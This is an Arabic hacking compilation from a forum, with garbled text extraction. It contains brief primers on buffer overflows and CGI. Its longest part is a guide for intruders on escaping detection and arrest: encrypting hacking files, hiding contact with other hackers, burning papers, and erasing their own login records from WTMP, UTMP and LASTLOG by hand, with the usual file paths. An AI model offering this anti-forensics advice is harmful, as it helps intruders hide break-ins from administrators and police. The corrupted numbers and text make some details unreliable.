                                                              ‫2- ما هو الـ ‪ Buffer Overflow‬؟‬
                                                                     ‫-------------------------->‬

                                                                       ‫6- المعالجه)‪(Proccess‬‬
                                                                            ‫----------------->‬

                                                   ‫3- إدارة الذاكره)‪(Memory management‬‬
                                                           ‫-------------------------------->‬

                                                      ‫.-استغالل ماذكر في الـ‪Buffer Overflow‬‬
                                                            ‫---------------------------------->‬

                                                     ‫*ماذا يجب أن أعرف قبل أن أقرأ هذه المقالة؟‬
  ‫ليس الكثير،،، فهذا دليل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة أساسية بمفهوم برامج الحاسوب‬
                                                                                   ‫وإدارة الذاكرة‬

                                                               ‫2-ما هو الـ‪ Buffer Overflow‬؟‬
                                                                      ‫<----------------------->‬

       ‫‪Buffer Overflow‬حالة تحدث لبرنامج بسبب برمجة سيئة أو بمعنى اخر برمجة تحمل أخطاء.‬
 ‫احدث ثغرة يمكنك أستغاللها من نوع ‪ Buffer Overflow‬تسمى فايروس ، '‪ 'code red‬التي أستغلت‬
                                                ‫في خادم ‪ IIS‬لمايكروسوفت- ‪-MS web server‬‬
‫عموما، يحدث ‪ Buffer Overflow‬عندما يظهر برنامج ما متغير بحجم ثابت (على سبيل المثال،حجم 26‬
                                  ‫بايت) و القيمة التي خصصت إلى هذه المتغير أكبر من حجم المتغير.‬

                                                                                   ‫خذ هذا المثال:‬
      ‫يظهر برنامجي على الشاشة هذه الجملة: "رجاء إطبع اسمك األول: "ثم سيأخذ برنامجي من المستخدم‬
                ‫البيانات التي سيدخلها وهي (اسمه األول) ثم توضع في متغير فتظهر في برنامجي او تخزن.‬
‫المشكلة هنا تكمن في انه إذا كان المتغير مخصص لتخزين بيانات حجمها األقصى يساوي 52 بايت والبيانات‬
   ‫هنا(وهي اسم المستخدم)حجمها 56 بايت التي ستخزن في المتغير (يتضح لنا ان اسم المستخدم وضع في‬
                                                                            ‫مكان اقل من حجمه.)‬
  ‫اذن ماذا سيحدث للبيانات الزائدة عن 52 بايت من المؤكد انها سـ"تطفح "‪ Overflow‬على الذاكرة التي‬
                                                                           ‫خصصت لمتغير االسم.‬

                                                           ‫عندما يبدأ البرنامج، تخصص الذاكرة :‬
                              ‫>‪<var1><var2><vname><Other things in memory‬‬
                                                                             ‫‪10b 6b 15b‬‬
       ‫1 ‪(var‬و 2 ‪var‬متغيرات ليست لها عالقة باألسم المدخل ‪ ,vname‬المتغير الذي حجمه 52 بايت‬
                                               ‫وهو الذي سيحتوي االسم الذي سيدخله المستخدم)‬

                       ‫نفترض ان المستخدم سيدخل االسم "‪abcabcabcabcabcabcabcabca‬‬
                                                    ‫"‪bc‬حينها ستبدو الذاكره هكذا:‬

                                                         ‫‪somevalue2avalusabcabcabc‬‬


                                              ‫38‬
                                                          ‫‪abcabcabcabcabcabc‬‬
                                    ‫>‪<var1 ><var2><vname ><other things go here‬‬

‫اذا ماذا حدث ؟؟ المتغير" ‪ vname‬طفح "‪ overflowed‬بسبب البيانات المدخلة عليه من قبل المستخدم‬
  ‫و قيمة ‪ "other things in memory‬أشياء اخرى في الذاكره" تغيرت بسبب فيض )‪(overflow‬‬
                                                              ‫الحروف من ادخال المستخدم.‬

                                                                      ‫اذن كيف أستغل هذا الخطأ؟؟؟‬
‫قبل أن نصل إلى الجواب، هناك بعض األشياء األساسية المهمة التي يجب علينا أن نعرفها حول تركيب وبنية‬
                                                                                       ‫الحاسوب .‬
                        ‫في هذه المقالة سنناقش نظام لينكس ،‪ linux‬لكن المفهوم مماثل لباقي األنظمة.‬


                                                                            ‫6-المعالجه:)‪(Proccess‬‬
                                                                                 ‫<---------------->‬

   ‫إن الوحدة الوظيفية األساسية في حاسوب يعمل هي عملية المعالجه.)‪ (Proccess‬في الحاسوب هنالك‬
    ‫العديد من العمليات ونظام التشغيل مسؤول عن تقسيم القوة التي تجعل العديد من العمليات تعمل في نفس‬
                                                                                  ‫الوقت في الحاسوب.‬
‫ليس هناك شيء إسمه "متعددالعمليات "‪ Multi- proccesses‬صحيح... كيف اذن؟؛ انَّ وحدة المعالجة‬
    ‫المركزية )‪(CPU‬تنتقل بين العمليات كلُُُ على حده بسرعة كبيره بحيث تبدو مثل العديد من المهام التي‬
                                                                                  ‫تعمل في وقت واحد،‬
               ‫اذا تبدو لنا كأن العمليات تعمل في وقت واحد وهذه من خدع الحاسوب التي يؤديها علينا :) ..‬
‫كل عملية لها عنوان فاضي من الذاكره ، واليمكن ألي عمليةآخرى تدخل في هذا المكان الفاضي من الذاكرة.‬
                                                         ‫وهذا يرشدنا الى شي اخر يجب ان تفهمه وهو:‬



                                                      ‫3-إدارة الذاكره:)‪(Memory management‬‬
                                                               ‫<------------------------------>‬

  ‫تدير أنظمة التشغيل-‪-operating systems‬الحديثة ذاكرة افتراضية(‪ virtual memory‬تخيلية).‬
               ‫ذلك يعني بأنه اليمكن ألي تطبيق (برنامج مثال) الوصول مباشرة إلى الذاكرة الحقيقية.لماذا؟؟‬
   ‫انظمة التشغيل ‪ Operating System‬تمتلك جدول تخطيط "تحويل العناوين الحقيقية من الذاكرة الى‬
                                                                            ‫عناوين افتراضية(تخيلية)" .‬
   ‫وعندما تقوم ذاكرة الـ( ‪ OS‬نظام التشغيل)بتحديد مكان في الذاكرة لبرنامج معين لتشغيله ،يأخذ البرنامج‬
                                                           ‫العنوان التخيلي فقط ، وليس العنوان الطبيعي.‬
‫و هنالك استخدام اخر للذاكرة اإلفتراضية(التخيلية) وهي انه من المعلوم أن الذاكرة الحقيقية ال ترتبط مباشرة‬
                        ‫بكل عملية (أو برنامج)، فنظام التشغيل يستخدم مساحة على القرص الصلب كذاكرة،‬
‫والتطبيق ال يمكنه أبدا معرفة مكان الذاكرة ( مكان الذاكرة الحقيقة،) ذلك ألن المساحة المخصصة للذاكرة في‬
                                                                            ‫القرص الصلب تتبدل وتتغير.‬

            ‫توضيح :. ان الذاكرة ال تنقسم الى ذاكرة حقيقة وذاكرة افتراضية بل أنهما ينتميان لذاكرة واحد‬
     ‫اذن ما فائدة التسمية الى حقيقية وافتراضية ؟؟ الجواب هو للمتييز فقط ، حيث ان الذاكرة الحقيقة تمثل‬
  ‫مساحة معينة من القرص الصلب (ومكان هذه المساحة في تغير مستمر) لذلك سميت حقيقية او بمعنى اخر‬
                             ‫طبيعية (اي بأستطاعتك لمس مكان الذاكرة الطبيعية بيدك على القرص الصلب)‬
‫وفائدة الذاكرة اإلفتراضية هي إعطاء عنوان افتراضي (غير حقيقي ) للذاكرة الحقيقية اي يعطي عنوان كأسم‬
   ‫فقط لمكان مساحة الذاكرة الطبيعية في القرص الصلب ، وإن تغير مكان المساحة المخصصة للذاكرة يظل‬
                                                                     ‫العنوان اإلفتراضي(التخيلي) ثابت.‬



                                                 ‫48‬
                                                              ‫.-استغالل ماذكر في الـ‪Buffer Overflow‬‬
                                                                      ‫<--------------------------------->‬
                                                                          ‫اآلن نصل إلى الجزء األهم والمر ح‬
       ‫كيف نستفيد من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى الجذر )‪ (Root‬وأختراق‬
‫النظام؟ تذكر نحن قلنا في وقت سابق بأنه عندما يكون اإلدخال(البيانات) من المستخدم أكبر حجما من الذاكرة‬
‫التي خصصت لهذه البيانات، البيانات الزائدة ستفيض )‪ (overflow‬في الذاكرة التي بعد االسم المتغير؟ هذا‬
                                                ‫المكان من الذاكرة هو المكان الذي نستفيد منه في األختراق.‬
    ‫ماذا نعمل في ذلك المكان: داخل خط (مكان) البيانات التي يدخلها المستخدم (في المثال السابق وهو االسم‬
‫األول الذي يطلب من قبل البرنامج ثم أدخلناه ) نضع األوامر األكثر شعبية للحاسوب، حيث هذه األوامر تجعل‬
  ‫الحاسوب يحدث(ينتج) هيكل نستطيع استخدامه فيما بعد للقيام بالسيطرة الكاملة للنظام المستغل. القيام بهذا‬
      ‫العمل ليس بيسطا كما يبدو لك، إذن لو أردت معرفة كيف يعمل ، أنت يجب أن تقرأ المقالة القادمة حول‬
   ‫،‪Buffer Overflows‬الذي سيصف بالضبط كيف إلستغالل واحده من الـ ‪Buffer Overflows‬في‬
                                                                                                  ‫اإلختراق.‬

   ‫اخيرا اتمنى انكم فهمتوا الدرس زين وعرفتوا ايش معنى ‪ Buffer Overflow‬واللي فهم الدرس نص‬
                                      ‫نص يعيد قرائته اكثر من مرة مع التدقيق وانشاهلل يفهم.‬

                                                ‫انتهى،،،‬




                       ‫" الـ ‪ CGI‬وعالقتها باإلنترنت "‬

                                                                                                 ‫<منقول>‬

                                                                        ‫<مترجم من قبل:‪>King_abdo‬‬




                                                   ‫58‬
                                  ‫في هذا الملف سوف نقوم بعرض مقدمة الـ ‪ CGI‬و عالقتها باالنترنت‬



                                                                                 ‫(2) مقدمة للـ ‪CGI‬‬



    ‫‪ CGI=COMMON GATEWAY INTERFACE‬هي الواجهة التي تسمح باالتصال بين جانب‬
                                                   ‫المستخدم عن طريق المتصفح أو البرامج‬

                                         ‫و خالفه و جانب الويب سيرفر الذي يفهم بروتوكول (‪)HTTP‬‬



     ‫الـ ‪ TCP/IP‬هو البروتوكول الذي يستخدمه سكريبت السي جي أي و السيرفر أثناء االتصال . البورت‬
                                                                                      ‫المحددة‬

                                           ‫لهذا البروتوكول هي 20 ( من الممكن أن تتغير هذه البورت)‬



‫تستطيع سكريبتات السي جي أي أن تقوم بتوليد صفحات الويب و الصور و أيضا نتائج محددة طبقا لمدخالت‬
                                                                                     ‫معينه يقوم‬



                                                                        ‫مبرمج السي جي أي بتحديدها‬



                                           ‫يقوم عمل سكريبتات السي جي أي علي خطوتين أساسيتين :‬



                         ‫2- في الخطوة األولى يقوم السكريبت بعمل معالجة أوليه للبيانات التي أدخلت له‬

   ‫6- في الخطوة الثانية يعمل السكريبت كقناه للبيانات التي يقوم المتصفح بارسالها الي السيرفر أو العكس‬



                     ‫يقوم سكريبت السي جي أي بتشفير البيانات حتي تتمكن من العمل في أي مناخ للعمل‬



             ‫يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة مثل الفيجوال بيسك‬

                              ‫أو لغة مترجمة مثل البيرل و الفرق الوحيد بين نوعين اللغات أن البرنامج‬

    ‫المبرمج باللغة المجمعة سوف يكون أسرع في التنفيذ و لكن اللغات المترجمة أسرع في عملية التطوير‬


                                               ‫68‬
                                       ‫للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره‬



                                       ‫أهم األوامر التي تعتبر وثيقة الصله لموضوعنا هي كالتالي :‬



                                      ‫2- ‪ GET‬هذا األمر يقوم بطلب بيانات من السيرفر للمتصفح‬

                   ‫6- ‪ POST‬هذا األمر يطلب من السيرفر قبول المعلومات المدخلة اليه من المتصفح‬

‫3- ‪ PUT‬هذا األمر يطلب من السيرفر قبول المعلومات المرسله اليه كبديل عن المدخالت الموجودة حاليا‬




                                                                               ‫(6) نقاط الضعف‬




             ‫نقاط الضعف التي يسببها سكريبت السي جي أي ليس ضعفا في السي جي أي نفسه و لكنه‬

                                      ‫ضعف في بروتوكول الـ‪ HTTP‬أو في أنظمة التشغيل المختلفة‬

 ‫السي جي أي يسمح باستغالل نقاط الضعف الموجودة و لكن هناك طرق أخري للوصول الي تحطيم النظام‬

             ‫األمني . كمثال يمكن الوصول الي الملفات الغير محمية باستخدام الـ ‪ FTP‬أو ‪.TELNET‬‬

                                         ‫انتهى،،،‬




               ‫" كيف تحمي نفسك وتخفي أفعالك؟!"‬

                                                                    ‫<منقول من منتدى إعصار>‬

                                                                              ‫<الكاتب: المدمر>‬

                                                                               ‫مقدمه بسيطه :‬
                                                                             ‫==========‬


                                           ‫78‬
 ‫في البدايه و قبل كل شئ ارجو منكم تحمل اخطائي سواء كانت نحويه او امالئيه .. كل ما اسعى له هو تعميم‬
                                                                                         ‫الفائده على الجميع‬
                                 ‫و ان نتقدم نحن العرب و نترقي باعل المستويات و المكانات الي نستحقها ..‬
          ‫الموضوع ليس صغير و ليس بسهل في القراءه .. ارجو ان تكون صبورا متانيا حتى اخر الموضوع‬
  ‫هذا الموضوع سيجعلك تخاف من خيالك و تعمل الف حساب لظلك .. لكن انشاله سيكون دفعه لالمام و ليس‬
                                                                                        ‫الن تخاف و تتراجع‬
      ‫اسلوب الموضوع غريب .. و عادة ما نتجنبه دائما .. بمعنى اخر .. كل من اخواننا و اساتذتنا من كتبوا‬
‫دروسا و شروحا في اختراق السيرفرات و المواقع كان همهم الوحيد في الحمايه هو مسح اللوق ‪log files‬‬
   ‫..لكن هل هذا يجعلك في امان تام ؟! هل هذا سيمنع تتبع اثرك ؟!! هذا ما ستكتشفه بعد االنتهاء من قراءة‬
                                                                                               ‫الموضوع ..‬
                                                                               ‫************************‬
     ‫اذا كنت تظن ان الحصول على ترجمة الثغرات ) ‪ ( exploites‬باسرع ما يمكن هو ما يجعلك محترفا و‬
                              ‫متطورا فاسمح لي بان اقول لك " انك انسان خاطئ و ان اسلوب تفكيرك غلط "‬
‫ماذا ستفيدك الثغره الحديثه جدا ( 2 ) ‪day‬عندما يتم القبض عليك اذا هاجمت احدى السيرفرات الكبيره .. ؟‬
                                                 ‫و عندها سيتم السيطره على اجهزتك و ادواتك و مراقبتك !؟!‬
‫يمكن يرى البعض ان هذا لم بحدث قط الي شخص نعرفه ؟ او ان بالدنا ليس فيها هذه التقنيات العاليه !! لكن‬
                                                                                     ‫هذا قد يحدث يوم ما !!‬
  ‫و ايضا انت التهاجم فقط سيرفرات بلدك انما سيرفرات اخرى عالميه محميه من قبل الشرطه الدوليه .. كما‬
                ‫انه البد من الحرص و فهم االمور اذا كنت تريد ان تسمي نفسك هكر ‪ hacker‬بمعنى الكلمه‬
    ‫ربما تعتقد في نفسك انك اكبر من قراءة هذا الموضوع بكثيير النك من المعروفين عنهم باالحتراف او انك‬
                ‫ترى ذلك في نفسك .. لكن انا اؤكد لك بانك مخطئ و انت تحتاج لقراءة الموضوع الي النهايه‬
                                                                               ‫************************‬
                                                                             ‫الموضوع مقسم الى 0 اجزاء :‬
                                                                             ‫=================‬
                                     ‫الجزء االول : المقدمه ( و هو ماقد قمت انت باالنتهاء من قرائته حاليا )‬
      ‫الجزء الثاني : االمور العقليه و كيف تصبح " ‪ **" Paranoid‬هذا الجزء سيتم عرضه من خالل هذه‬
                                                                                                ‫المواضيع :‬
                                                                                          ‫-الدافع او الحافز‬
                                                                  ‫-لماذا ان البد ان تصبح " ‪" Paraniod‬‬
                                                                  ‫-كيف يمكن ان تصبح " ‪ " Paranoid‬؟‬
                                                  ‫-و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!‬

   ‫**متاكد ان معظمكم يتسائل عن معنى هذه الكلمه .. سيتم توضيح معناها و مفهومها مع شر ح هذا الجزء‬
                                                                                                 ‫انشاله.‬
   ‫الجزء الثالث : االساسيات التي يجب عليك معرفتها قبل ان تقوم باي عملية اختراق ( و سيتم عرضها من‬
                                                                                   ‫خالل النقاط التاليه )‬
                                                                                                 ‫-تمهيد‬
                                                                                            ‫-امن نفسك‬
                                                                                      ‫-حسابك الخاص‬
                                                                                ‫-ملفات اللوق‪LoGs‬‬
                                                                                      ‫-ال تترك اي اثر‬
                                                             ‫-امور و اشياء يجب تجنبها و الحظر منها‬
          ‫الجزء الرابع : التقنيات الحديثه الي يتي يجب مالحظتها ( و سيتم عرضه من خالل النقاط التاليه )‬
                                                                                                 ‫-تمهيد‬
                                                                         ‫-امنع تقفى اثرك من اي نوع‬
                                 ‫-ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما كان فيها من تالعب ..‬
                                                ‫-تحقق من‪syslog configuration and logfile‬‬
                                                               ‫-تحقق من نوعيات برامج االمن المثبته‬
                                                                  ‫-تحقق من وجود المدراء‪Admins‬‬
                                          ‫-كيف يمكن تصحيح ‪checksum checking software‬‬


                                                   ‫88‬
                                                                                  ‫-حيل المستخدم االمنيه‬

                                                     ‫الجزء الخامس : ماذا تفعل ان وضعت تحت المراقبه‬
    ‫الجزء السادس : ما الذي عليك القيام به و ايضا الذي البد من عدم القيام به في حالة انه تم القبض عليك‬
                                                 ‫الجزء السابع : قائمه بافضل البرامج للتخفي و االختباء‬
     ‫الجزء الثامن : كلمه ختاميه ........ ارجو ان تتابعو الموضوع بحرض و تركيز شديدن من االن ... !!!‬

                                                                             ‫************************‬
                                                                                            ‫الجز الثاني :‬
                                                                                            ‫=======‬
                                                                                      ‫-الدافع و الحافز :‬
                                                                                         ‫*************‬
   ‫البد من تحكيم العقل للنجا ح في اي عمل .. العقل هو القوه التي ستدفعك و تحفزك لتصبح انسان واقعي ..‬
                                                                                       ‫مسئول و حريص‬
    ‫المخترق ) ‪ ( Hacker‬الناجح البد و ان تتوفر فيه هذه المبادىء و االمكانيات العقليه .. مثلها مثل بناء‬
         ‫عضالت الجسم لن يكبر الجسم و يتقسم اال بعد ممارسة الرياضه الخاصه بذلك ( على سبيل المثال )‬
      ‫مهما كنت متمرس او لديك الكثيير من المعلومات البد اخذ اشد االحتياطات و الحذر قبل القيام باي شئ‬

                                                               ‫-لماذا يجب ان تصبح " ‪ " Paranoid‬؟‬
                                                                         ‫***************************‬
  ‫كلمة " " ‪ Paranoia‬في اللغه االنجليزيه تعني جنون االرتياب ( نزعه عند االفراد تجعلك تشك في جميع‬
                                                                               ‫االمور و جميع االشخاص )‬
                                             ‫اعتقدان االمور بدات تتضح لنا بعد معرفة اصل هذه الكلمه ..‬
     ‫يمكن ان نلخض ما ذكر من خالل الكلمات التاليه ‪ : paraniod‬تعني ان تصبح شديد الحذر و الشك في‬
                                                                                          ‫جميع الظروف‬
                                                         ‫لماذا يجب توخي الحذر بهذه الطريقه المخيفه ؟!!‬
‫الن توقعك دائما الى اسوء الظروف يجعلك تسير في امان .. و الن ما تفعله هو شئ كبيير جدا .. ما تراه انت‬
 ‫بعينك المجرده انك تغير الصفحه الرئيسيه .. او تقوم بتحميل بعض المعلومات من السيرفر هو شئ بسيط بل‬
                                                                                            ‫و سهل جدا‬
‫ماذا لو انك اخترقت سيرفر معين و تم رصدك و تتبعك و القبض عليك من قبل الشرطه !؟! و انك سترمى في‬
                                                                            ‫السجن كالسارقين و المجرمين‬
 ‫ان كنت ال تهتم بما قد يحصل لك .. عليك االهتمام بما ما قد يصيب اهلك .. ابوك ... امك .. اخوتك .. زوجتك‬
                                                                              ‫و اطفالك ( ان كنت متزوج )‬
                                   ‫ربما التشعر بان ماتقوم به هو جريمه .. لكن في الحقيقه هي جريمه !!‬
                                                           ‫هل تعرف ماذا سينتظرك ان تم القبض عليك ؟!‬
‫سيتم حرمانك من كل امور الكومبيوتر .. نظرة الناس الغيير طبيعيه لك ( ليست نظرة اعجاب انما نظرة خوف‬
‫) .. لن تحظى بفرص العمل التي تستحقها .. ستسدعى عند حصول اي مشاكل اخرى من هذا النوع .. لذا فان‬
                                                                ‫معظم من يسقطون ال يقومون ثاني ابدا !!‬

                                                             ‫لذا فاصبح حذرا جدا و شكاكا .. امن نفسك‬
                                                                                ‫اخذ جميع االحتياطات‬
                                                ‫التهتم بما قديقوله الكثيرون عنك بانك خواف او ما شابه‬
                                                            ‫اهتم باي ملف ‪ log‬مهما كانت قيمته تافهه‬
                                                ‫لتصبح ‪ hacker‬عليك ان تقوم بعملك .. سليما 222 %‬

                                                                      ‫-كيف تصبح " ‪ " Paranoid‬؟‬
                                                                              ‫*********************‬
‫اذا كنت قرأت ما سبق و اقتنعت به انت بالفعل اصبحت هذا الشخص " ‪ " Paranoid‬لكن االقتناع وحده ال‬
   ‫يكفي و التحمس وحده وليد اللحظه ايضا اليكفي ... انما البد ان يكون القلق و التوتر موجودين بشكل دائم‬
                                                                               ‫في حياتك ( االلكترونيه )‬


                                                  ‫98‬
‫اذا كنت فعال تريد ان تكون هكر حقيقي ... البد ان تعرف لمن تقول هذه الحقيقه و كيف تتعامل مع االخرين ..‬
    ‫اعمل حساب انك مراقب دائما و انه هناك كاميرا خفيه وراك دائما .. فاحذر في كالمك على الهاتف النه قد‬
                ‫يكون مراقب .. او حتى بريديك الشخصي و االلكتروني ( البد ان تعمل حساب الغير المتوقع )‬

                          ‫اذا ما قد ذكرته ال يهمك و انك انسان غير مبالي .. دعني اسألك هذه االسئله ؟‬
   ‫هل تريد ان يراك االخرين مجرم ؟ هل تريد ان ترى الحزن و الدموع على وجه اهلك ؟ هل تريد ان تحسر‬
                                                                                   ‫قلوبهم عليك ؟!‬
                                                      ‫هل تريد ان تفقد اصدقائك ؟ خطيبتك ؟ صحبتك ؟‬
                                       ‫تذكر ان الضرر لن يعود عليك فقط انما سيعود على كل من تعرفه‬

                                              ‫-و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!‬
                                                      ‫******************************************‬
 ‫بما انك قد استوعبت ماذكر حتى االن و قررت ان تكون انسان حريص جدا .. البد ان تبقى هكذا طوال الوقت‬
          ‫و تذكر هذه الكلمات : لحظة كسل واحده في اتخاذ االحتياطات االمنيه قد تغير حياتك باكملها ؟!!!!‬
                                                                                     ‫دائما تذكر الدافع‬

                                                                                   ‫-الجزء الثالث:‬
                                                                                  ‫=========‬
                                                                                            ‫-تمهيد‬
                                                                                           ‫******‬
    ‫يجب معرفة هذه االمور القادمه و استيعابها جيدا قبل ممارسة اي عملية اختراق .. حتى لو كنت مخترق‬
                                                           ‫متمرس البد ان تستوعب االفكار القادمه‬

                                                                                      ‫-امن نفسك :‬
                                                                                      ‫***********‬
                                           ‫-ماذا لو قرأ ال ‪ SysAdmin‬رسائلك البريديه االلكترونيه ؟‬
                                     ‫-ماذا لو كانت اتصاالتك الهاتفيه مسجله و مراقبه من قبل الشرطه ؟‬
                                   ‫-ماذا لو تم ضبط الكومبيوتر الشخصي و السيطره على كل معلوماتك ؟‬

‫اذا كنت التقوم بعمل اي اتصاالت هاتفيه مع اي شخص من الهاكرز او الكراكرز .. وال تبعث اي ايميالت فيه‬
‫معلومات مشبوهه و ال تمتلك اي معلومات امنيه و حساسه على جهازك فهذا ببساطه ال يشكل اي خوف النه‬
                                                            ‫ببساطه ايضا انت لست مخترق او)= ‪hacker‬‬
          ‫النه البد من وجود اتصال بينك و بين اصدقائك المهتمين بهذا المجال .. لتبادل االخبار و االفكار ..‬
    ‫كما انه البد و انك تمتلك بعض الملفات الالزمه لالختراق او بعض المعلومات الي تعبر مدينه لك في حالة‬
                                                                            ‫حدوث رصد لجهازك ( كبسه )‬
                                                                                                    ‫--<‬
                                                                                                    ‫>--‬

                                        ‫قم بتشفير كل ما تملكه من معلومات حساسه ‪sensitive data‬‬
     ‫يمكنك ذلك باستخدام بعض البرامج الموجوده مجانا على االنترنت .. و هذه قائمه بافضل البرامج و التي‬
                                                                          ‫تعتبر اختيار الهاكرز االول :‬
                                  ‫-لمستخدمين ‪ MsDos‬اليكم 71.‪ SFS v‬او‪SecureDrive 1.4b‬‬
    ‫-لمستخدمين نظام *‪ Amiga‬اليكم * ( 5.1‪ EnigmaII v‬احدى انظمة التشغيل غير شائعة االستخدام‬
                                                                          ‫خصوصا في عالمنا العربي )‬
                                                      ‫-لمستخدمين انظمة ال ‪ Unix‬اليكم33.1‪CFS v‬‬

            ‫لتشفير الملفات بشكل فردي ( ملف بملف ) اليكم هذه البرامج ( االكثر شهره و االحسن اداء ) :‬

                                                                                      ‫‪- Triple DES‬‬
                                                                                             ‫‪- IDEA‬‬


                                                 ‫09‬
                                                                       ‫)‪- Blowfish (32 rounds‬‬
                                                                                     ‫‪- file2file‬‬

                                                                                     ‫لتشفير االيميالت :‬
                                                                                    ‫‪- PGP v2.6.x‬‬

         ‫يمكنك ايضا تشفير عملية اتصالك ب ( ‪ Unix System‬على اساس انه ممكن ان تكون مراقب )‬
                                                                                      ‫و ذلك باستخدام :‬
                                                                               ‫‪- SSH‬االمن حتى االن‬
                                                                                     ‫‪- DES Login‬‬
  ‫اجعل كلماتك السريه صعبة التخمين .. غير منطقيه .. غير شائعه .. ال توجد في القواميس .. لكن في نفس‬
                                                                            ‫الوقت البد ان تتذكرها دائما‬
‫اخترها من كتاب تتمتلكه .. اجعلها اكبر عدد ممكن من االحرف ( يعني عادة عند عمل اي اشتراك يطلب منك‬
                                                 ‫كلمه سريه تتكون من . -0 احرف ) فاختر ال 0 حروف‬
  ‫ال تحفظ ارقام هواتف اصحابك الهاكرز بشكل اعتيادي .. انما يمكنك بان تشفرها ( حتى برموز تفهمها انت‬
                                                    ‫فقط ) و اتصل بهم من هواتف الشارع او من العمل ..‬
                      ‫اذا انت بالفعل متعمق جدا في الهاكينج فالبد من تشفير كل شئ يتعلق بهذه االمور !!‬
         ‫احفظ دائما نسخه احتياطيه من معلوماتك على ‪ CD‬او ‪ HD‬و بالطبع تكون مشفره حتى اذا خسرت‬
                                              ‫المعلومات الموجوده على جهازك يكون لديك نسخ احتياطيه‬
‫التحتفظ بملفات التحتاجها .. و ان كان لديك ‪ document files‬او ملفات مطبوعه و ال تريدها مرة اخرى‬
 ‫التقطعها اعتياديا انما احرقها في مكان بعيد كل البعد عن اماكن تواجدك االعتياديه او ان اردت االحتفاظ بها‬
                                        ‫فعليك كتابتها من جديد باسلوب مرمز او مشفر اليعرفه اال انت !!‬

                                                                           ‫هل تعرف انه من الممكن ان :‬
                                                                          ‫=================‬
‫تكون مراقب من : الشرطه , المخابرات , هاكرز اخرون و انهم يتسطيعون رصد كل حركات باستخدام وسائل‬
                                                                                    ‫حديثه اليمكن تخيلها‬
                                                                                                  ‫مثل :‬
                                                  ‫-اجهزه تصوير تستطيع تصويرك عند بعد مئات االمتار‬
                                                   ‫-نقطة ليزر مصوبه نحو غرفتك للتصنت على مكالماتك‬
                         ‫-موجات عالية التردد للتنصت على لمسات و صوت يديك على ال!! ‪keyborad‬‬
   ‫تختلف بالطبع هذه االمكانيات من مكان الخر و من دوله الى اخرى .. و يرى البعض انه فيما اقوله مبالغه‬
                                ‫!!! لكن انت ال تعرف ماذا يخبئ لك المستقبل !! فلماذا التستعد من االن !!!‬
‫كما انه هناك الكثيير من اخواننا العرب في دول الخارج الذي بالفعل تتوفر فيها اجهزة التنصت هذه ... و على‬
   ‫راي المثل المصري " امشي عدل يحتار عدوك فيك " فكلما كنت احتياطيا و حركاتك تحسبها بشكل صحيح‬
                                                                            ‫!!! ففرص اطاحتك قليله جدا‬



                                                                       ‫حساباتك و اشتراكات الشخصيه :‬
                                                                     ‫===================‬
          ‫هنا سأتكلم عن حساباتك الشخصيه سواء كانت في العمل\المدرسه\الجامعه\اي كان فعليك بالتالي :‬
      ‫-ابدا ال تقوم باي عمل غيير قانوني .. او مشبوه بحسابتك الشخصيه التي فيها يكون اسمك الحقيقي و‬
                                                                           ‫هويتك و تفصيالت كامله عنك‬
                                     ‫-عمرك ما تحاول ان تتصل بموقع قد تم اختراقه بواسطة ال ‪telnet‬‬
           ‫-يمكنك االشتراك بحسابك الخاص في قائمة البريد الي موقع امني ‪ security‬من دون خوف ..‬
                         ‫-لكن كل مو هو مختص بالهاكينج من ملفات البد ان تشفر او انها يتم مسحها فورا‬
                           ‫-ابدا ال تحفظ اي برامج و ادوات االختراق على الهارديسك في حسابك الشخصي‬
                                                 ‫-بريدك الحقيقي التعطيه اال لمن تثق فيه ثقه عمياء !!!!‬
      ‫-اهتمامك بالسكيورتي ال يجعلك مشبوها .. انما االهتمام بعكس السكيورتي هو المشكله == >الهاكينج‬


                                                 ‫19‬
                                                                                    ‫----<‬
                                                                      ‫ملفات اللوق : ‪LoGS‬‬
                                                                       ‫============‬
                                                                  ‫هناك 3 ملفات مهمه جدا :‬
      ‫‪- WTMP‬للتسجيل عند الدخول و الخروج ) ‪( log on/off - log in/logout + tty + host‬‬
                                                      ‫‪- UTMP‬للمتواجدين اونالين حاليا !‬
                                          ‫‪- LASTLOG‬تسجيل من اين جاءت هذه ‪logins‬‬

                          ‫**سنتكلم عنهم باستفاضه و تعمق فيما بعد ( في جزء اخر من نفس الموضوع )‬

‫كل عملية دخول بواسطة ال ‪ telnet , ftp , rlogin‬يتم تسجيلها في هذه الملفات .. البد حذف دخولك من‬
                                                               ‫هذه الملفات و اال سيتم معرفة االتي :‬
                                                                            ‫-ماذا قمت باالختراق !!‬
                                                                             ‫-من اي مكان انت قادم‬
                                                                      ‫-كم من الوقت بقيت اونالين..‬

    ‫خطا يقع فيه الجميع بنسبة 8.88 % مننا ( حتى انا كنت اقع في نفس هذا الخطا زمان .. لكن اتعلمت ) و‬
                                                                       ‫هو انك تمسح اللوقات ‪logfiles‬‬
‫علطول .. هذا مجدي في حالة انك التهتم بان يعرف االدمين انه هناك مخترق ما قد دخل على النظام .. اما اذا‬
 ‫اردت ان تشتغل شغل المحترفين عليك الدخول و الخروج دون ان يالحظك اي شخص .. دون ان تقوم بتغيير‬
                                                                         ‫اي شئ يلفت انتباه مدير النظام‬
                                                                                 ‫و لعمل ذلك تابع معي :‬
      ‫التعتمد البرامج التي روجت على انها التقوم بمسح اللوق انما تقوم بحذف دخولك فهي غيير مجديه مثل‬
                                                                              ‫برنامج2‪ZAP (or ZAP‬‬
           ‫النه يقوم بعمل اصفار كاخر لوق مكانك انت و هذا ايضا دليل على وجود خطا سيالحظه مدير النظام‬
                                                                           ‫اذا عليك بالقيام بذلك يدويا ..‬
         ‫عادة البد ان تكوت ‪ root‬لتغير و تعدل في ال ( ‪ log files‬باستثناء بعض التوزيعات القديمه جدا )‬
                                          ‫اماكن تواجد ملفات اللوق ( ‪ default‬تختلف باختالف التوزيع )‬
                  ‫‪UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬
                 ‫‪WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬
                     ‫‪LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log‬‬
